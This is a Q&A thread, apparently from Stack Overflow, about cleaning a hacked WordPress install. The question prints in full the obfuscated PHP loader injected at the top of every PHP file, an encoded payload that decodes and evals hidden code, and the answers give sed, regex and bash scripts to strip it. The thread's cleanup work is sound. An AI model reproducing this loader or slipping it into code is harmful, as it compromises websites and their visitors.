# Removing a string in a PHP file with Start and End

Tags: php, wordpress, edit

I'm trying to clean a WordPress which has been infected by an exploit.

All php files were added a line like this at the beginning of it :

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yaagutonoj = 'Qtpz)#]341]88M4P8]37]278]225]241]334]3672%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) 25)utjm!|!*5!%x5c%x7827!hmg%y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%xc^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c7,18R#>q%x5c%x7825V<*#fop60gvodujpo)##-!#~<#%x5c%x782f%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+I#)0~:<h%x5c%x7825_t%x5c%x7825:osvufs:~5c%x7825%x5c%x7878:-6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782place("%x2f%50%x2e%52%x29%57%x65",x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)su6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78}X%x5c%x7824<!%x5c%x7825tzw>!#]y7)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#c%x787fw6*CW&)7gj6<*K)ftpmdX^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78287f_*#ujojRk3%x5c%x7860{6667824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cqp%x5c%x7825!|Z~!<##!>!2p%%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]x5c%x7825)3of)fepdof%x5c%x7"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x function fjfgg($n){returnx78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%xl}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)!%x5c%x7825t::!>!%x5c%x7824Ypp5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyidubn%x5c%x7860hfsq)!sp!*5c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%_*#fmjgk4%x5c%x7860{6~6<tfs%x%x7825s:N}#-%x5c%x7825o:W%x5c%x782x787f;!osvufs}w;*%x5c%x787f!>>%x5%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7827824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%xR25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%5-#jt0}Z;0]=]0#)2q%x5c%x782524-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf4-%x5c%x7824b!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg825h00#*<%x5c%x7825nfd)##x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878p5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y8j%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5cc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x7%x5c%x7822)!gj}1~!<2p%x5c)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3x7825yy)#}#-#%x5c%x7824-%x5c%x785h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f61]y33]68]y34]68]y33]65]y31]53]y6d]2ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78x5c%x7825eN+#Qi%x5c%x78x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%248]y83]256]y81]265]y72]254]y76]7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5cc%x5c%x7825}&;ftmbg}%x5c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x8257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827x5c%x7825)ppde>u%x5c%x7825V<#65,47]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dc%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbtcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bu27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR323zbe!-#jt0*?]+^?]_%x5c%x785c6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5)ufttj%x5c%x7822)gj6<^#Y#78256<pd%x5c%x7825w6Z6<.3%x5c*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj1]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rhW~%x5c%x7825fdy)##-!#~<%x5c%x7;!>!}%x5c%x7827;!>>>!}_;gve%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%%x7824*<!%x5c%x7824-%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]s%x5c%x78256~6<%x5c%x787fw6<*K){hnpd19275fubmgoj{h1:|:%x7825bss-%x5c%x7825r%x5c%x7878B)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x78x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c5c:>1<%x5c%x7825b:>1<!gpsy7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x7878:<##:>:h%x5c%x7825:<#x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x782525}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#765ww2)%x5c%x7825w%x5c%x78}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%xy39]271]y83]256]y78]#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*17824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjuc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fq%x5c%x7825:>:r%x5c%x7825:)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x786Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%42]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss134%x78%62%x35%165%x3a%146%x21%75]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]2ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<>!#]y84]275]y83]248]y83]256]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3381]y43]78]y33]65]y31]55]y85]82]y76]62x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&if((function_exists("%x6f%142%x5f%163%x74%141%x860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7877825%x5c%x785cSFWSFT%x5c%x7860%x5c%x87fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.5Ld]55#*<%x5c%x7825bG9}:c%x7822!pd%x5c%x7825)!gj}%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7f%x5c%x7860439275ttfsqnpdov{h19275jx782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5cx5c%x7827jsv%x5c%x78]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", N58]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78248]322]3]364]6]283]427]36]373P6]36]73]864y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782407825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!5c%x7860LDPT7-UFOJ%x5c%x7860GB)99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%ftpmdXA6|7**197-2qj%x5c%:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67yek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo##00;quui#>.%x5c%x7825!<*4l}%x5c%x7827;%x5c%x782h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%#00#W~!%x5c%x7825t2w)##Qtjw)2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ULL); }+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f chr(ord($n)-1);} @error_reporting(0); preg_reoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7{ $GLOBALS["%x61%156%x75%156%x61"]=1;epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]yx7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x782567825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7855c%x7825)fnbozcYufhA%x587fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x7-#w#)ldbqov>*ofmy%x5c%x783]238M7]381]211M5]67]452]88]5]52]y85]256]y6g]257]y86]267]y74f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x7%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825wx5c%x78786<C%x5c%x7827&6<*rfs%x5c3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5cbE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x725)}.;%x5c%x7860UQPMSVD!-id%x5c%24-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xfubfsdXA%x5c%x7827K6<%x5c%x787fw6*3q4}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x7822l:!}V;3q%x5c%x78985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%xfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf5!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%xA6~6<u%x5c%x78257>%x5c%%x7825z>2<!%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M/(.*)/epreg_replacetgodenjrri'; $savthdkijb = explode(chr((172-128)),'6639,47,39,57,8359,37,1364,26,8276,46,633,34,1297,67,3647,46,9998,54,6236,32,730,67,4866,53,8595,47,8086,50,4270,29,8931,45,6153,35,6589,50,3518,55,978,28,9858,23,3432,54,8976,33,4745,64,9640,65,5067,31,7543,24,1390,61,7444,31,9313,36,2878,67,883,38,8703,23,3000,48,3792,59,7023,20,5407,67,4245,25,6872,55,6686,46,8891,40,6768,55,3282,53,1911,29,8491,64,5819,62,4117,63,8762,44,1054,27,1817,52,8726,36,5683,49,8136,42,3371,38,9221,32,7281,51,4840,26,3622,25,1974,33,6847,25,5967,37,3731,61,4535,40,3242,40,7778,52,1518,62,7378,66,4299,68,452,47,8806,25,96,28,667,63,4052,65,9179,42,2420,57,3048,25,7970,70,499,68,1869,42,921,57,8234,42,7686,24,3851,65,830,53,7733,45,1143,26,2551,42,2351,69,8185,49,1741,25,9588,52,2593,52,7475,68,2502,49,3983,69,7637,49,4367,52,1451,67,1270,27,2113,60,6732,36,9060,56,3693,38,7710,23,9705,59,1680,61,6927,35,5098,23,2945,55,2645,62,9116,63,4575,60,5931,36,4477,58,3916,34,2173,59,3109,45,261,25,8322,37,4919,54,9396,21,5546,67,567,66,2232,28,1580,70,4180,30,797,33,8040,46,5351,56,6464,28,124,45,6268,48,8861,30,7332,46,355,36,7567,70,7830,42,321,34,6074,26,5264,62,5474,27,7191,53,5613,46,7900,70,6492,60,9349,47,7084,69,169,53,5881,50,1006,48,2330,21,3154,32,2260,70,5153,66,9253,60,1081,62,4973,26,2067,46,5219,45,286,35,4999,68,6408,56,1650,30,9009,51,3409,23,1766,51,9764,41,5501,45,8396,35,6100,53,4635,58,6004,70,7872,28,4693,52,5121,32,9901,68,9969,29,9417,68,9534,54,3950,33,411,41,10052,54,1234,36,8555,40,4210,35,6823,24,2707,50,3186,56,4809,31,2477,25,0,39,7153,38,8831,30,6358,50,6188,48,2007,60,3573,49,1940,34,5326,25,3073,36,1169,65,7244,37,9805,53,8642,61,222,39,8431,60,6962,61,9881,20,5659,24,9485,49,391,20,2757,67,5752,67,2824,54,4419,58,6316,42,5732,20,3486,32,3335,36,6552,37,7043,41,8178,7'); $nibnkcwalu=substr($yaagutonoj,(49971-39865),(41-34)); if (!function_exists('twwdyxiyuj')) { function twwdyxiyuj($gfkbogqkzl, $xpwveotxbw) { $bepljhengq = NULL; for($oznuhtwycd=0;$oznuhtwycd<(sizeof($gfkbogqkzl)/2);$oznuhtwycd++) { $bepljhengq .= substr($xpwveotxbw, $gfkbogqkzl[($oznuhtwycd*2)],$gfkbogqkzl[($oznuhtwycd*2)+1]); } return $bepljhengq; };} $azydrlsozu="\x20\57\x2a\40\x73\152\x76\152\x63\167\x61\147\x65\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x35\71\x36\55\x35\60\x34\51\x29\54\x20\164\x77\167\x64\171\x78\151\x79\165\x6a\50\x24\163\x61\166\x74\150\x64\153\x69\152\x62\54\x24\171\x61\141\x67\165\x74\157\x6e\157\x6a\51\x29\51\x3b\40\x2f\52\x20\145\x63\141\x6f\156\x74\151\x6a\146\x6c\40\x2a\57\x20"; $xpkuyrwixg=substr($yaagutonoj,(30604-20491),(47-35)); $xpkuyrwixg($nibnkcwalu, $azydrlsozu, NULL); $xpkuyrwixg=$azydrlsozu; $xpkuyrwixg=(455-334); $yaagutonoj=$xpkuyrwixg-1; ?>
```

The content of this line is random for each files, but they all start with `<?php if(!isset($GLOBALS[` and ends with `-1; ?>`.

I'm trying to create a PHP file removing this line to all my files.

Here's what I've done now :

```
<?php

$dir_iterator = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($dir_iterator);
$infected = 0;
$clean = 0;
foreach ($iterator as $file) {
if($file->getExtension() == 'php'){
    $f = fopen($file->getPathname(), 'r+');

    $start = '<?php if(!isset($GLOBALS[';
    $end = '-1; ?>';

    if(fgets($f, 26) == '<?php if(!isset($GLOBALS[')
    {
        echo '<p style="color: red;"> The file '. $file->getPathname() . ' is infected ! </p>';

        // Don't know what to do here

        $infected++;            
    }
    else
    {
        echo '<p style="color: green;"> The file '. $file->getPathname() . ' is clean ! </p>';
        $clean++;
    }


}

}

echo $infected.' files infected <br />';
echo $clean. ' files clean.';
```

?>

But I'm not very eased with file editing in PHP, so I would like to remove the line starting with my `$start` and ending with my `$end` .

I'm a bit lost with `fseek`, `fwrite` in the PHP doc, and don't really know which one I should use and how.

Waiting for your help :) !

Comment: You should clean this up by hand to make sure you remove the entire hacker's business. Btw. "random" is not random at all ;-)

Comment: Hey, I know it's not "random" but what I meant is it's not exactly the same string ! There is more than 5000 files with all plugins and themes, that's why I'm trying to remove it automatically, and it's always the first line which is modified, and they all start with the patterns I identified.

Comment: And I'm starting from a fresh Wordpress install, but I'd like to get back my themes, because I don't have no backups of them.

Answer (score 5):

You might want to switch tools for this job. Use `sed(1)`:

```
$ sed -e '1 s/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php
```

You can write a thin `exec()` wrapper in PHP, if you have no shell access.

Comment: It looks great, but I'm not getting it working. 
`<?php
 exec("sed -e '1 s/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php");
?>`

I'm getting an error : "Notice: Array to string conversion in C:\wamp\www\crossfader\desinfect.php on line 2".

Cygwin is installed, so it's not the problem.

Comment: The problem is, that you use double-quotes (") and inside the string the text `$GLOBALS`. PHP thinks, you want to include this variable. Escape the `$`: `\$GLOBALS`. Also do escape the backslashes: `//`.

Comment: That's `\​\​`, obviously, not `//`. Sorry!

Comment: Now it's not displaying error, but still not working. I'll try it on a real Unix environment.

Comment: I tried it on Mac OS, it shows me my files without the hacker's line but it's not saving them. Maybe it's missing a parameter ? (I'm using sudo)

Comment: Sorry for the long delay! If it's of any use anymore: The way of saying `sed` to save the files is adding the parameter `-i`: `sed -i -e ...`

Answer (score 4):

I am angry of ruined servers and I have written script as a class to solve this, when you don't have root access to server.

```
// Import and setup Guardian script
include '../NarniaGuardian/NarniaGuardian.php';
$Guard = new NarniaGD;
$Guard->cleanFiles('../wordpress/');
```

You would import code, point it to root of malware and update malware sample library until everything is clean.

Please, for more check here https://github.com/Pilskalns/Narnia-Guardian

OOP approach could be easy edited further to monitor if anything comes along again.

Answer (score 2):

I write script to delete this malware.

```
function deleteMalware()
{
    $directory_iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(ABSPATH, RecursiveDirectoryIterator::SKIP_DOTS));
    foreach($directory_iterator as $filename => $file)
    {
        if ($file->getExtension() !== "php") {
            continue;
        }
        $content = file_get_contents($filename);
        $reg = '/<\?\s*php\s*if\(!isset\(\$GLOBALS\[\"\\\\x61(.*?)-1;\s*\?>/s';
        $count = 0;
        $newContent = preg_replace ($reg, '', $content, -1, $count);

        if($count === 1) {
            file_put_contents ($filename, $newContent);
        }
    }

};
```

I hope it helps :)

Answer (score 1):

One of my customers had exactly the same issue and we had to run trough it, we found that there might be several types of PHP files and not all of them starts the same,
all the above solutions would work only if all PHP files on your server starts with `?php`, anything else would damage your files.

The solution we used (provided below) catches all infected PHP files on your server, backup them (with it original path),restoring them into it orig state, and also write a summary file with the result
It works great for my customer (about 21000~ PHP files scanned and fixed in 7min)
In order to use it copy the below code into file on your home directory
name the file `php_fix.sh`

Make it executable by typing
`chmod +x php_fix.sh`
and run it:
`./php_fix.sh y`

You may also download it from my site:
http://okgamestudio.com/sites/igal/php_fix.sh

```
#!/bin/bash

infected_files=0
fixed_files=0
DATE=`date +"%d-%m-%y %T"`
find . -name "*.php" |grep -v 2fix > php_files.dat

php_files=`cat php_files.dat |wc -l`

if [ ! `ls 2fix` ]
then
    mkdir 2fix
fi

while read file_name
do
    if [[ `head -1 $file_name |grep GLOBALS` ]]
    then
            if [[ $1 == "y" ]]
        then
        fixed_string=`head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'`
        cp --parents $file_name 2fix/
            sed -i "1s/.*/$fixed_string/" $file_name
        #sed -i "1s/.*/\<\?php/" $file_name
        #sed -i '1d' $file_namea
        let fixed_files=$fixed_files+1
        else
        let infected_files=$infected_files+1
    fi  
    fi
done < php_files.dat
echo $DATE, "Scannded files:" $php_files, "Fixed files:" $fixed_files, "Infected: " $infected_files >> fixed_files.dat
exit


# head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'
```

Answer (score 1):

I forked `Narnia-Guardian` for easy use and bugfix.

1. Download `WordpressGuardian` source code https://github.com/liruqi/WordpressGuardian
2. Backup your affected wordpress copy
3. `bash NarniaGuardian.sh [path to wordpress root]`
4. Find suspicious/malicious long-line unreable code, update pattern in `blacklist.txt`
5. Go back to step 2

This can clean up injected code.

Another possible approch is to find long lines in PHP file. And remove them or replace them with `<?php` if needed.

Answer (score 0):

Using    `sed -i.bak 's/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php` is working for me. Essentially just replacing -e with -i.bak

Answer (score 0):

I had once to deal with this problem and I finally had to create an script to remove all lines from the /var/www directory.

You can see here https://stackoverflow.com/a/26285498/3000681

regards.